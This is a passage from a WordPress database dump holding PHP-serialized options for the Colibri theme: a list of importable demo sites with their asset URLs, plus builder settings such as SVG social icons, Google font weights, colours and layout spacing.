PRO\";s:4:\"slug\";s:19:\"holistic-healer-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/holistic-healer-pro/content.xml\";s:22:\"import_widget_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/holistic-healer-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/holistic-healer-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/holistic-healer-pro/screenshot.jpg\";s:11:\"preview_url\";s:56:\"https://colibriwp-work.colibriwp.com/holistic-healer-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:19.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:89;a:11:{s:16:\"import_file_name\";s:10:\"Rental PRO\";s:4:\"slug\";s:10:\"rental-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/rental-pro/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/rental-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/rental-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/rental-pro/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/rental-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-10-05 12:12:27.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:90;a:11:{s:16:\"import_file_name\";s:13:\"Pub / Bar PRO\";s:4:\"slug\";s:11:\"pub-bar-pro\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pub-bar-pro/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pub-bar-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pub-bar-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/pub-bar-pro/screenshot.jpg\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/pub-bar-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:17.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:91;a:11:{s:16:\"import_file_name\";s:14:\"Motorcycle PRO\";s:4:\"slug\";s:14:\"motorcycle-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/motorcycle-pro/content.xml\";s:22:\"import_widget_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/motorcycle-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/motorcycle-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:80:\"https://static.colibriwp.com/templates-screenshots/motorcycle-pro/screenshot.jpg\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/motorcycle-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:53:53.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:92;a:11:{s:16:\"import_file_name\";s:18:\"Transportation PRO\";s:4:\"slug\";s:18:\"transportation-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/transportation-pro/content.xml\";s:22:\"import_widget_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/transportation-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:98:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/transportation-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:84:\"https://static.colibriwp.com/templates-screenshots/transportation-pro/screenshot.jpg\";s:11:\"preview_url\";s:55:\"https://colibriwp-work.colibriwp.com/transportation-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-04 10:48:31.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:93;a:11:{s:16:\"import_file_name\";s:20:\"Language Courses PRO\";s:4:\"slug\";s:20:\"language-courses-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/language-courses-pro/content.xml\";s:22:\"import_widget_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/language-courses-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:100:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/language-courses-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:86:\"https://static.colibriwp.com/templates-screenshots/language-courses-pro/screenshot.jpg\";s:11:\"preview_url\";s:57:\"https://colibriwp-work.colibriwp.com/language-courses-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:53:41.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:94;a:11:{s:16:\"import_file_name\";s:8:\"Taxi PRO\";s:4:\"slug\";s:8:\"taxi-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/taxi-pro/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/taxi-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/taxi-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:74:\"https://static.colibriwp.com/templates-screenshots/taxi-pro/screenshot.jpg\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/taxi-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:53:39.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:95;a:11:{s:16:\"import_file_name\";s:11:\"Airclub PRO\";s:4:\"slug\";s:11:\"airclub-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/airclub-pro/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/airclub-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/airclub-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/airclub-pro/screenshot.jpg\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/airclub-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:53:11.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:96;a:11:{s:16:\"import_file_name\";s:15:\"Car service PRO\";s:4:\"slug\";s:15:\"car-service-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/car-service-pro/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/car-service-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/car-service-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/car-service-pro/screenshot.jpg\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/car-service-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-03-23 12:55:42.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:97;a:11:{s:16:\"import_file_name\";s:15:\"Christmas gifts\";s:4:\"slug\";s:15:\"christmas-gifts\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/christmas-gifts/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/christmas-gifts/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/christmas-gifts/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/christmas-gifts/screenshot.jpg\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/christmas-gifts\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-12-17 16:25:20.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:98;a:11:{s:16:\"import_file_name\";s:16:\"Colibri Handyman\";s:4:\"slug\";s:16:\"colibri-handyman\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/colibri-handyman/content.xml\";s:22:\"import_widget_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/colibri-handyman/widgets.wie\";s:26:\"import_customizer_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/colibri-handyman/customizer.dat\";s:24:\"import_preview_image_url\";s:82:\"https://static.colibriwp.com/templates-screenshots/colibri-handyman/screenshot.jpg\";s:11:\"preview_url\";s:53:\"https://colibriwp-work.colibriwp.com/colibri-handyman\";s:7:\"plugins\";a:2:{s:57:\"colibri-template-generator/colibri-template-generator.php\";N;s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-06-07 14:29:03.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:0;}}}','yes'),(349,'colibri-wp_companion_old_show_on_front','page','yes'),(350,'colibri-wp_companion_old_page_on_front','20','yes'),(351,'colibri_manual_create_pages','1','yes'),(352,'extend_builder_theme','a:16:{s:5:\"icons\";a:11:{s:17:\"brandico/facebook\";s:284:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"facebook\" viewBox=\"0 0 486.037 1007\"><path d=\"M124 1005V536H0V367h124V223C124 110 197 5 366 5c68 0 119 7 119 7l-4 158s-52-1-108-1c-61 0-71 28-71 75v123h183l-8 169H302v469H123\"/></svg>\";s:17:\"font-awesome/star\";s:395:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"star\" viewBox=\"0 0 1664 1896.0833\"><path d=\"M1664 647q0 22-26 48l-363 354 86 500q1 7 1 20 0 21-10.5 35.5T1321 1619q-19 0-40-12l-449-236-449 236q-22 12-40 12-21 0-31.5-14.5T301 1569q0-6 2-20l86-500L25 695Q0 668 0 647q0-37 56-46l502-73L783 73q19-41 49-41t49 41l225 455 502 73q56 9 56 46z\"/></svg>\";s:28:\"font-awesome/facebook-square\";s:410:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"facebook-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1248 128q119 0 203.5 84.5T1536 416v960q0 119-84.5 203.5T1248 1664h-188v-595h199l30-232h-229V689q0-56 23.5-84t91.5-28l122-1V369q-63-9-178-9-136 0-217.5 80T820 666v171H620v232h200v595H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960z\"/></svg>\";s:27:\"font-awesome/twitter-square\";s:630:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"twitter-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1280 610q-56 25-121 34 68-40 93-117-65 38-134 51-61-66-153-66-87 0-148.5 61.5T755 722q0 29 5 48-129-7-242-65T326 550q-29 50-29 106 0 114 91 175-47-1-100-26v2q0 75 50 133.5t123 72.5q-29 8-51 8-13 0-39-4 21 63 74.5 104t121.5 42q-116 90-261 90-26 0-50-3 148 94 322 94 112 0 210-35.5t168-95 120.5-137 75-162T1176 746q0-18-1-27 63-45 105-109zm256-194v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:27:\"font-awesome/youtube-square\";s:1354:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"youtube-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M919 1303v-157q0-50-29-50-17 0-33 16v224q16 16 33 16 29 0 29-49zm184-122h66v-34q0-51-33-51t-33 51v34zM532 915v70h-80v423h-74V985h-78v-70h232zm201 126v367h-67v-40q-39 45-76 45-33 0-42-28-6-17-6-54v-290h66v270q0 24 1 26 1 15 15 15 20 0 42-31v-280h67zm252 111v146q0 52-7 73-12 42-53 42-35 0-68-41v36h-67V915h67v161q32-40 68-40 41 0 53 42 7 21 7 74zm251 129v9q0 29-2 43-3 22-15 40-27 40-80 40-52 0-81-38-21-27-21-86v-129q0-59 20-86 29-38 80-38t78 38q21 29 21 86v76h-133v65q0 51 34 51 24 0 30-26 0-1 .5-7t.5-16.5V1281h68zM785 457v156q0 51-32 51t-32-51V457q0-52 32-52t32 52zm533 713q0-177-19-260-10-44-43-73.5t-76-34.5q-136-15-412-15-275 0-411 15-44 5-76.5 34.5T238 910q-20 87-20 260 0 176 20 260 10 43 42.5 73t75.5 35q137 15 412 15t412-15q43-5 75.5-35t42.5-73q20-84 20-260zM563 519l90-296h-75l-51 195-53-195h-78q7 23 23 69l24 69q35 103 46 158v201h74V519zm289 81V470q0-58-21-87-29-38-78-38-51 0-78 38-21 29-21 87v130q0 58 21 87 27 38 78 38 49 0 78-38 21-27 21-87zm181 120h67V350h-67v283q-22 31-42 31-15 0-16-16-1-2-1-26V350h-67v293q0 37 6 55 11 27 43 27 36 0 77-45v40zm503-304v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:25:\"font-awesome/vimeo-square\";s:540:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"vimeo-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1292 638q10-216-161-222-231-8-312 261 44-19 82-19 85 0 74 96-4 57-74 167t-105 110q-43 0-82-169-13-54-45-255-30-189-160-177-59 7-164 100l-81 72-81 72 52 67q76-52 87-52 57 0 107 179 15 55 45 164.5t45 164.5q68 179 164 179 157 0 383-294 220-283 226-444zm244-222v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:17:\"font-awesome/plus\";s:353:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"plus\" viewBox=\"0 0 1408 1896.0833\"><path d=\"M1408 736v192q0 40-28 68t-68 28H896v416q0 40-28 68t-68 28H608q-40 0-68-28t-28-68v-416H96q-40 0-68-28T0 928V736q0-40 28-68t68-28h416V224q0-40 28-68t68-28h192q40 0 68 28t28 68v416h416q40 0 68 28t28 68z\"/></svg>\";s:18:\"font-awesome/minus\";s:251:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"minus\" viewBox=\"0 0 1408 1896.0833\"><path d=\"M1408 736v192q0 40-28 68t-68 28H96q-40 0-68-28T0 928V736q0-40 28-68t68-28h1216q40 0 68 28t28 68z\"/></svg>\";s:25:\"font-awesome/chevron-left\";s:320:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"chevron-left\" viewBox=\"0 0 1289.1823 1896.0833\"><path d=\"M1171 301L640 832l531 531q19 19 19 45t-19 45l-166 166q-19 19-45 19t-45-19L173 877q-19-19-19-45t19-45L915 45q19-19 45-19t45 19l166 166q19 19 19 45t-19 45z\"/></svg>\";s:26:\"font-awesome/chevron-right\";s:317:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"chevron-right\" viewBox=\"0 0 1280 1896.0833\"><path d=\"M1107 877l-742 742q-19 19-45 19t-45-19l-166-166q-19-19-19-45t19-45l531-531-531-531q-19-19-19-45t19-45L275 45q19-19 45-19t45 19l742 742q19 19 19 45t-19 45z\"/></svg>\";s:17:\"font-awesome/bars\";s:439:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"/></svg>\";}s:5:\"fonts\";a:2:{s:6:\"native\";a:0:{}s:6:\"google\";a:9:{s:4:\"Muli\";a:2:{s:7:\"weights\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"400\";i:5;s:9:\"400italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Open Sans\";a:2:{s:7:\"weights\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"400\";i:3;s:9:\"400italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Playfair Display\";a:2:{s:7:\"weights\";a:6:{i:0;s:3:\"400\";i:1;s:9:\"400italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Abril Fatface\";a:3:{s:8:\"category\";s:7:\"display\";s:7:\"subsets\";a:2:{i:0;s:9:\"latin-ext\";i:1;s:5:\"latin\";}s:7:\"weights\";a:1:{i:0;s:3:\"400\";}}s:4:\"Acme\";a:3:{s:8:\"category\";s:10:\"sans-serif\";s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"weights\";a:1:{i:0;s:3:\"400\";}}s:10:\"Advent Pro\";a:3:{s:8:\"category\";s:10:\"sans-serif\";s:7:\"subsets\";a:3:{i:0;s:5:\"greek\";i:1;s:9:\"latin-ext\";i:2;s:5:\"latin\";}s:7:\"weights\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"400\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}}s:4:\"Alef\";a:3:{s:8:\"category\";s:10:\"sans-serif\";s:7:\"subsets\";a:2:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";}s:7:\"weights\";a:2:{i:0;s:3:\"400\";i:1;s:3:\"700\";}}s:7:\"Arsenal\";a:3:{s:8:\"category\";s:10:\"sans-serif\";s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:10:\"vietnamese\";i:2;s:9:\"latin-ext\";i:3;s:12:\"cyrillic-ext\";i:4;s:5:\"latin\";}s:7:\"weights\";a:4:{i:0;s:3:\"400\";i:1;s:9:\"400italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}}s:5:\"Baloo\";a:3:{s:8:\"category\";s:7:\"display\";s:7:\"subsets\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:10:\"devanagari\";i:2;s:9:\"latin-ext\";i:3;s:5:\"latin\";}s:7:\"weights\";a:1:{i:0;s:3:\"400\";}}}}s:6:\"colors\";a:6:{i:0;s:7:\"#303e7a\";i:1;s:7:\"#f7e597\";i:2;s:7:\"#f66161\";i:3;s:7:\"#9ec9e2\";i:4;s:7:\"#f6f8fa\";i:5;s:7:\"#202a54\";}s:11:\"dummyChange\";s:0:\"\";s:10:\"typography\";a:0:{}s:6:\"global\";a:9:{s:7:\"content\";a:2:{s:8:\"template\";s:0:\"\";s:10:\"collection\";s:0:\"\";}s:6:\"titles\";a:10:{s:16:\"normalPageFormat\";s:7:\"{TITLE}\";s:17:\"normalResultsPage\";s:27:\"Search results for: {TITLE}\";s:9:\"errorPage\";s:22:\"Sorry! Page Not Found!\";s:10:\"singlePost\";s:7:\"{TITLE}\";s:15:\"categoryArchive\";s:16:\"Posts in {TITLE}\";s:13:\"authorArchive\";s:16:\"Posts in {TITLE}\";s:10:\"tagArchive\";s:16:\"Posts in {TITLE}\";s:11:\"yearArchive\";s:16:\"Posts in {TITLE}\";s:12:\"monthArchive\";s:16:\"Posts in {TITLE}\";s:10:\"dayArchive\";s:16:\"Posts in {TITLE}\";}s:6:\"vSpace\";a:2:{s:5:\"value\";i:20;s:4:\"unit\";s:2:\"px\";}s:6:\"hSpace\";a:2:{s:5:\"value\";i:20;s:4:\"unit\";s:2:\"px\";}s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:90;s:4:\"unit\";s:2:\"px\";}s:10:\"transition\";a:1:{s:8:\"duration\";a:2:{s:5:\"value\";s:3:\"0.5\";s:4:\"unit\";s:1:\"s\";}}s:9:\"templates\";a:2:{s:4:\"blog\";a:2:{s:5:\"style\";a:1:{s:11:\"descendants\";a:2:{s:7:\"section\";a:1:{s:7:\"padding\";a:2:{s:3:\"top\";a:1:{s:5:\"value\";s:2:\"90\";}s:6:\"bottom\";a:1:{s:5:\"value\";s:2:\"90\";}}}s:13:\"sidebar-right\";a:3:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:5:\"value\";i:25;s:4:\"unit\";s:1:\"%\";}}s:8:\"maxWidth\";a:2:{s:5:\"value\";i:25;s:4:\"unit\";s:1:\"%\";}s:5:\"media\";a:2:{s:6:\"mobile\";a:2:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:5:\"value\";s:3:\"100\";s:4:\"unit\";s:1:\"%\";}}s:8:\"maxWidth\";a:2:{s:5:\"value\";s:3:\"100\";s:4:\"unit\";s:1:\"%\";}}s:6:\"tablet\";a:2:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:4:\"unit\";s:1:\"%\";s:5:\"value\";s:5:\"33.33\";}}s:8:\"maxWidth\";a:2:{s:4:\"unit\";s:1:\"%\";s:5:\"value\";s:5:\"33.33\";}}}}}}s:5:\"props\";a:1:{s:11:\"descendants\";a:2:{s:3:\"row\";a:2:{s:6:\"layout\";a:2:{s:13:\"horizontalGap\";i:2;s:11:\"verticalGap\";i:2;}s:14:\"layout-classes\";a:3:{s:5:\"unset\";b:1;s:11:\"outer_class\";a:1:{i:0;s:16:\"gutters-row-lg-2\";}s:11:\"inner_class\";a:1:{i:0;s:16:\"gutters-col-lg-2\";}}}s:7:\"section\";a:1:{s:8:\"sidebars\";a:1:{s:5:\"right\";b:1;}}}}}s:11:\"woocommerce\";a:2:{s:5:\"props\";a:1:{s:11:\"descendants\";a:1:{s:7:\"section\";a:1:{s:8:\"sidebars\";a:1:{s:4:\"left\";b:1;}}}}s:5:\"style\";a:1:{s:11:\"descendants\";a:1:{s:12:\"sidebar-left\";a:1:{s:11:\"columnWidth\";a:1:{s:6:\"custom\";a:2:{s:4:\"unit\";s:1:\"%\";s:5:\"value\";i:25;}}}}}}}s:13:\"multilanguage\";a:2:{s:5:\"props\";a:2:{s:7:\"enabled\";b:1;s:4:\"type\";s:8:\"dropdown\";}s:5:\"style\";a:4:{s:11:\"descendants\";a:2:{s:9:\"container\";a:3:{s:10:\"background\";a:1:{s:5:\"color\";s:5:\"white\";}s:3:\"top\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:80;}s:6:\"border\";a:2:{s:3:\"top\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}s:6:\"bottom\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}}}s:5:\"flags\";a:1:{s:7:\"padding\";a:4:{s:3:\"top\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:14;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:18;}s:6:\"bottom\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:14;}s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:18;}}}}s:10:\"background\";a:1:{s:5:\"color\";s:5:\"white\";}s:3:\"top\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:80;}s:6:\"border\";a:2:{s:3:\"top\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}s:6:\"bottom\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}}}}s:5:\"media\";a:2:{s:6:\"mobile\";a:1:{s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:30;s:4:\"unit\";s:2:\"px\";}}s:6:\"tablet\";a:1:{s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:60;s:4:\"unit\";s:2:\"px\";}}}}s:4:\"menu\";a:2:{s:16:\"defaultLocations\";a:3:{s:6:\"header\";a:2:{i:0;a:3:{s:2:\"id\";s:11:\"header-menu\";s:5:\"label\";s:19:\"Header primary menu\";s:8:\"priority\";i:1;}i:1;a:3:{s:2:\"id\";s:13:\"header-menu-1\";s:5:\"label\";s:21:\"Header secondary menu\";s:8:\"priority\";i:2;}}s:7:\"content\";a:1:{i:0;a:3:{s:2:\"id\";s:12:\"content-menu\";s:5:\"label\";s:12:\"In Page 